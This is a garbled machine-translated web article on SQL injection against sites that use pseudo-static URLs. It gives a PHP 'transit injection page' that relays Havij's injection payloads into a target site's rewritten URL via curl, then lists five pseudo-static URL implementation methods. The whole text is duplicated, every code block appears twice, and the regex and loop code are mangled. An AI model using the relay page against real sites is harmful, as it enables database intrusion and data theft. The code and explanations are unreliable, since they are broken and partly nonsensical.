First, let's talk about the implementation method: inj. php: [php] & lt ;? Phpset_time_limit (10); $ id = $ _ GET [& quot; id & quot;]; $ id = str_replace (& quot;, & quot; % 20 & quot;, $ id); $ id = str_replace (& quot; = & quot;, & quot;
First, the implementation method is as follows:
Inj. php:
[Php]
Set_time_limit (10 );
$ Id = $ _ GET ["id"];
$ Id = str_replace ("", "% 20", $ id );
$ Id = str_replace ("=", "% 3D", $ id );
$ Url = "http://www.xxx.com/index.php/library/more/id/mongoid.html ";
$ Ch = curl_init ();
Curl_setopt ($ ch, CURLOPT_URL, "$ url ");
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1); // When enabled, the information obtained by curl_init () is returned in the form of a file stream, rather than directly output
Curl_setopt ($ ch, CURLOPT_HEADER, 0); // When enabled, the header file information is output as a data stream.
$ Output = curl_exec ($ ch );
Curl_close ($ ch );
Print_r ($ output );
?>
Set_time_limit (10 );
$ Id = $ _ GET ["id"];
$ Id = str_replace ("", "% 20", $ id );
$ Id = str_replace ("=", "% 3D", $ id );
$ Url = "http://www.xxx.com/index.php/library/more/id/mongoid.html ";
$ Ch = curl_init ();
Curl_setopt ($ ch, CURLOPT_URL, "$ url ");
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1); // When enabled, the information obtained by curl_init () is returned in the form of a file stream, rather than directly output
Curl_setopt ($ ch, CURLOPT_HEADER, 0); // When enabled, the header file information is output as a data stream.
$ Output = curl_exec ($ ch );
Curl_close ($ ch );
Print_r ($ output );
?>
Use wamp to build a server, put inj. php in wamp/www/, and then run http: // 127.0.0.1/inj. php in Havij? Id = 1
==================================
PHP pseudo-static implementation method 1 (using the functions of the Apache server)
1. check whether Apache supports mod_rewrite.
2. enable Apache to support. htaccess
3. create a. htaccess file
4. rules:
RewriteEngine on
RewriteRule (%a-za-z%}1,%}-(%0-9%}1,%}.html $ index. php? Action = $1 & id = $2
([A-zA-Z] {1,})-([0-9] {1,}) What is the URL length?
$1 is ([a-zA-Z] {1,}) matched
$2 is matched by [0-9] {1 ,}
For example: www.xx.com/page-18.html
The actual URL is as follows:
Action = page
Id = 18
======================================
PHP pseudo-static implementation method 2 (encoding implementation)
$ Php2Html_FileUrl = $ _ SERVER ["REQUEST_URI"]
Echo $ Php2Html_FileUrl
Example: // localhost/php100/test. php? Id | 1 @ action | 2
[Php]
$ Php2Html_UrlString = str_replace ("? "," ", Str_replace ("/"," ", strrchr ($ Php2Html_FileUrl ,"/"),"? "))))
/*
Strrchr in the lower layer:/test. php? Id | 1 @ action | 2
Strrchr of the outer layer: id | 1 @ action | 2
Str_replace in the lower layer: remove the/number. this example does not contain
Str_replace of the outer layer: put? No. In this example
*/
$ Php2Html_UrlQueryStrList = explode ("@", $ Php2Html_UrlString );
/* Convert str into an array divided by @: id | 1 and action | 2 */
Foreach ($ Php2Html_UrlQueryStrList as $ Php2Html_UrlQueryStr)
{
$ Php2Html_TmpArray = explode ("|", $ Php2Html_UrlQueryStr );
/* Id => 1 and action => 2 */
$ _ GET [$ Php2Html_TmpArray [0] = $ Php2Html_TmpArray [1];
}
$ Php2Html_UrlString = str_replace ("? "," ", Str_replace ("/"," ", strrchr ($ Php2Html_FileUrl ,"/"),"? "))))
/*
Strrchr in the lower layer:/test. php? Id | 1 @ action | 2
Strrchr of the outer layer: id | 1 @ action | 2
Str_replace in the lower layer: remove the/number. this example does not contain
Str_replace of the outer layer: put? No. In this example
*/
$ Php2Html_UrlQueryStrList = explode ("@", $ Php2Html_UrlString );
/* Convert str into an array divided by @: id | 1 and action | 2 */
Foreach ($ Php2Html_UrlQueryStrList as $ Php2Html_UrlQueryStr)
{
$ Php2Html_TmpArray = explode ("|", $ Php2Html_UrlQueryStr );
/* Id => 1 and action => 2 */
$ _ GET [$ Php2Html_TmpArray [0] = $ Php2Html_TmpArray [1];
}
======================================
PHP pseudo-static implementation method 3 (encoding implementation)
Example: localhost/php100/test. php/1/2
[Php]
$ Filename = basename ($ _ SERVER ["SCRIPT_NAME"]);
Echo $ _ SERVER ["SCRIPT_NAME"];
Echo $ filename;
If (strtolower ($ filename) = 'Test. php '){
If (! Empty ($ _ GET [id]) {
$ Id = intval ($ _ GET [id]);
Echo $ id;
$ Action = intval ($ _ GET [action]);
Echo $ action;
} Else {
$ Nav = $ _ SERVER ["REQUEST_URI"];
$ Script = $ _ SERVER ["SRCIPT_NAME"];
// This sentence should be replaced by the section above the URL .. There are "1/2" and so on ..
$ Nav = ereg_replace ("$ script", "", urldecode ($ nav ));
Echo $ nav;
$ Vars = explode ("/", $ nav );
Print_r ($ vars );
$ Id = intval ($ vars [1]);
$ Action = intval ($ vars [2]);
}
Echo $ id. '&'. $ action;
}
$ Filename = basename ($ _ SERVER ["SCRIPT_NAME"]);
Echo $ _ SERVER ["SCRIPT_NAME"];
Echo $ filename;
If (strtolower ($ filename) = 'Test. php '){
If (! Empty ($ _ GET [id]) {
$ Id = intval ($ _ GET [id]);
Echo $ id;
$ Action = intval ($ _ GET [action]);
Echo $ action;
} Else {
$ Nav = $ _ SERVER ["REQUEST_URI"];
$ Script = $ _ SERVER ["SRCIPT_NAME"];
// This sentence should be replaced by the section above the URL .. There are "1/2" and so on ..
$ Nav = ereg_replace ("$ script", "", urldecode ($ nav ));
Echo $ nav;
$ Vars = explode ("/", $ nav );
Print_r ($ vars );
$ Id = intval ($ vars [1]);
$ Action = intval ($ vars [2]);
}
Echo $ id. '&'. $ action;
}
======================================
PHP pseudo-static implementation method 4 (encoding implementation)
[Php]
Function mod_rewrite (){
Global $ _ GET;
$ Nav = $ _ SERVER ["REQUEST_URI"];
$ Script_name = $ _ SERVER ["SCRIPT_NAME"]
$ Nav = substr (ereg_replace ("$ script_name"), "", urldecode ($ nav), 1 );
$ Nav = preg_replace ("/^. ht (m) {1} (l) {0, 1} $/"," ", $ nav); // remove the htm or html
$ Vars = explode ("/", $ nav );
Print_r ($ vars );
For ($ I = 0; $ I {
$ _ GET [$ vars [$ I] = $ vars [$ I + 1];
}
Return $ _ GET;
}
Function mod_rewrite (){
Global $ _ GET;
$ Nav = $ _ SERVER ["REQUEST_URI"];
$ Script_name = $ _ SERVER ["SCRIPT_NAME"]
$ Nav = substr (ereg_replace ("$ script_name"), "", urldecode ($ nav), 1 );
$ Nav = preg_replace ("/^. ht (m) {1} (l) {0, 1} $/"," ", $ nav); // remove the htm or html
$ Vars = explode ("/", $ nav );
Print_r ($ vars );
For ($ I = 0; $ I {
$ _ GET [$ vars [$ I] = $ vars [$ I + 1];
}
Return $ _ GET;
}
======================================
PHP pseudo-static implementation method 5 (encoding implementation)
Example:/, 8630.html
[Php]
If (preg_match ("/\/(\ d +), (\ d +), (\ d +) \. html/si", $ path_info, $ arr_path )){
$ Gid = intval ($ arr_path [1]); // get the value 1
$ Sid = intval ($ arr_path [2]); // get the value 100
$ Softid = intval ($ arr_path [3]); // get the value 8630
}
Else
Echo "Path: Error! ";
If (preg_match ("/\/(\ d +), (\ d +), (\ d +) \. html/si", $ path_info, $ arr_path )){
$ Gid = intval ($ arr_path [1]); // get the value 1
$ Sid = intval ($ arr_path [2]); // get the value 100
$ Softid = intval ($ arr_path [3]); // get the value 8630
}
Else
Echo "Path: Error! ";
Conclusion: (1) the pseudo-static technology is a good breakthrough. you need to construct a transit injection page by yourself.
(2) The Principles of pseudo-static technology are very simple, that is, the original index. php? Id = 1.
First, the implementation method is as follows:
Inj. php:
[Php]
Set_time_limit (10 );
$ Id = $ _ GET ["id"];
$ Id = str_replace ("", "% 20", $ id );
$ Id = str_replace ("=", "% 3D", $ id );
$ Url = "http://www.xxx.com/index.php/library/more/id/mongoid.html ";
$ Ch = curl_init ();
Curl_setopt ($ ch, CURLOPT_URL, "$ url ");
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1); // When enabled, the information obtained by curl_init () is returned in the form of a file stream, rather than directly output
Curl_setopt ($ ch, CURLOPT_HEADER, 0); // When enabled, the header file information is output as a data stream.
$ Output = curl_exec ($ ch );
Curl_close ($ ch );
Print_r ($ output );
?>
Set_time_limit (10 );
$ Id = $ _ GET ["id"];
$ Id = str_replace ("", "% 20", $ id );
$ Id = str_replace ("=", "% 3D", $ id );
$ Url = "http://www.xxx.com/index.php/library/more/id/mongoid.html ";
$ Ch = curl_init ();
Curl_setopt ($ ch, CURLOPT_URL, "$ url ");
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1); // When enabled, the information obtained by curl_init () is returned in the form of a file stream, rather than directly output
Curl_setopt ($ ch, CURLOPT_HEADER, 0); // When enabled, the header file information is output as a data stream.
$ Output = curl_exec ($ ch );
Curl_close ($ ch );
Print_r ($ output );
?>
Use wamp to build a server, put inj. php in wamp/www/, and then run http: // 127.0.0.1/inj. php in Havij? Id = 1
==================================
PHP pseudo-static implementation method 1 (using the functions of the Apache server)
1. check whether Apache supports mod_rewrite.
2. enable Apache to support. htaccess
3. create a. htaccess file
4. rules:
RewriteEngine on
RewriteRule (%a-za-z%}1,%}-(%0-9%}1,%}.html $ index. php? Action = $1 & id = $2
([A-zA-Z] {1,})-([0-9] {1,}) What is the URL length?
$1 is ([a-zA-Z] {1,}) matched
$2 is matched by [0-9] {1 ,}
For example: www.xx.com/page-18.html
The actual URL is as follows:
Action = page
Id = 18
======================================
PHP pseudo-static implementation method 2 (encoding implementation)
$ Php2Html_FileUrl = $ _ SERVER ["REQUEST_URI"]
Echo $ Php2Html_FileUrl
Example: // localhost/php100/test. php? Id | 1 @ action | 2
[Php]
$ Php2Html_UrlString = str_replace ("? "," ", Str_replace ("/"," ", strrchr ($ Php2Html_FileUrl ,"/"),"? "))))
/*
Strrchr in the lower layer:/test. php? Id | 1 @ action | 2
Strrchr of the outer layer: id | 1 @ action | 2
Str_replace in the lower layer: remove the/number. this example does not contain
Str_replace of the outer layer: put? No. In this example
*/
$ Php2Html_UrlQueryStrList = explode ("@", $ Php2Html_UrlString );
/* Convert str into an array divided by @: id | 1 and action | 2 */
Foreach ($ Php2Html_UrlQueryStrList as $ Php2Html_UrlQueryStr)
{
$ Php2Html_TmpArray = explode ("|", $ Php2Html_UrlQueryStr );
/* Id => 1 and action => 2 */
$ _ GET [$ Php2Html_TmpArray [0] = $ Php2Html_TmpArray [1];
}
$ Php2Html_UrlString = str_replace ("? "," ", Str_replace ("/"," ", strrchr ($ Php2Html_FileUrl ,"/"),"? "))))
/*
Strrchr in the lower layer:/test. php? Id | 1 @ action | 2
Strrchr of the outer layer: id | 1 @ action | 2
Str_replace in the lower layer: remove the/number. this example does not contain
Str_replace of the outer layer: put? No. In this example
*/
$ Php2Html_UrlQueryStrList = explode ("@", $ Php2Html_UrlString );
/* Convert str into an array divided by @: id | 1 and action | 2 */
Foreach ($ Php2Html_UrlQueryStrList as $ Php2Html_UrlQueryStr)
{
$ Php2Html_TmpArray = explode ("|", $ Php2Html_UrlQueryStr );
/* Id => 1 and action => 2 */
$ _ GET [$ Php2Html_TmpArray [0] = $ Php2Html_TmpArray [1];
}
======================================
PHP pseudo-static implementation method 3 (encoding implementation)
Example: localhost/php100/test. php/1/2
[Php]
$ Filename = basename ($ _ SERVER ["SCRIPT_NAME"]);
Echo $ _ SERVER ["SCRIPT_NAME"];
Echo $ filename;
If (strtolower ($ filename) = 'Test. php '){
If (! Empty ($ _ GET [id]) {
$ Id = intval ($ _ GET [id]);
Echo $ id;
$ Action = intval ($ _ GET [action]);
Echo $ action;
} Else {
$ Nav = $ _ SERVER ["REQUEST_URI"];
$ Script = $ _ SERVER ["SRCIPT_NAME"];
// This sentence should be replaced by the section above the URL .. There are "1/2" and so on ..
$ Nav = ereg_replace ("$ script", "", urldecode ($ nav ));
Echo $ nav;
$ Vars = explode ("/", $ nav );
Print_r ($ vars );
$ Id = intval ($ vars [1]);
$ Action = intval ($ vars [2]);
}
Echo $ id. '&'. $ action;
}
$ Filename = basename ($ _ SERVER ["SCRIPT_NAME"]);
Echo $ _ SERVER ["SCRIPT_NAME"];
Echo $ filename;
If (strtolower ($ filename) = 'Test. php '){
If (! Empty ($ _ GET [id]) {
$ Id = intval ($ _ GET [id]);
Echo $ id;
$ Action = intval ($ _ GET [action]);
Echo $ action;
} Else {
$ Nav = $ _ SERVER ["REQUEST_URI"];
$ Script = $ _ SERVER ["SRCIPT_NAME"];
// This sentence should be replaced by the section above the URL .. There are "1/2" and so on ..
$ Nav = ereg_replace ("$ script", "", urldecode ($ nav ));
Echo $ nav;
$ Vars = explode ("/", $ nav );
Print_r ($ vars );
$ Id = intval ($ vars [1]);
$ Action = intval ($ vars [2]);
}
Echo $ id. '&'. $ action;
}
======================================
PHP pseudo-static implementation method 4 (encoding implementation)
[Php]
Function mod_rewrite (){
Global $ _ GET;
$ Nav = $ _ SERVER ["REQUEST_URI"];
$ Script_name = $ _ SERVER ["SCRIPT_NAME"]
$ Nav = substr (ereg_replace ("$ script_name"), "", urldecode ($ nav), 1 );
$ Nav = preg_replace ("/^. ht (m) {1} (l) {0, 1} $/"," ", $ nav); // remove the htm or html
$ Vars = explode ("/", $ nav );
Print_r ($ vars );
For ($ I = 0; $ I {
$ _ GET [$ vars [$ I] = $ vars [$ I + 1];
}
Return $ _ GET;
}
Function mod_rewrite (){
Global $ _ GET;
$ Nav = $ _ SERVER ["REQUEST_URI"];
$ Script_name = $ _ SERVER ["SCRIPT_NAME"]
$ Nav = substr (ereg_replace ("$ script_name"), "", urldecode ($ nav), 1 );
$ Nav = preg_replace ("/^. ht (m) {1} (l) {0, 1} $/"," ", $ nav); // remove the htm or html
$ Vars = explode ("/", $ nav );
Print_r ($ vars );
For ($ I = 0; $ I {
$ _ GET [$ vars [$ I] = $ vars [$ I + 1];
}
Return $ _ GET;
}
======================================
PHP pseudo-static implementation method 5 (encoding implementation)
Example:/, 8630.html
[Php]
If (preg_match ("/\/(\ d +), (\ d +), (\ d +) \. html/si", $ path_info, $ arr_path )){
$ Gid = intval ($ arr_path [1]); // get the value 1
$ Sid = intval ($ arr_path [2]); // get the value 100
$ Softid = intval ($ arr_path [3]); // get the value 8630
}
Else
Echo "Path: Error! ";
If (preg_match ("/\/(\ d +), (\ d +), (\ d +) \. html/si", $ path_info, $ arr_path )){
$ Gid = intval ($ arr_path [1]); // get the value 1
$ Sid = intval ($ arr_path [2]); // get the value 100
$ Softid = intval ($ arr_path [3]); // get the value 8630
}
Else
Echo "Path: Error! ";
Conclusion: (1) the pseudo-static technology is a good breakthrough. you need to construct a transit injection page by yourself.
(2) The Principles of pseudo-static technology are very simple, that is, the original index. php? Id = 1.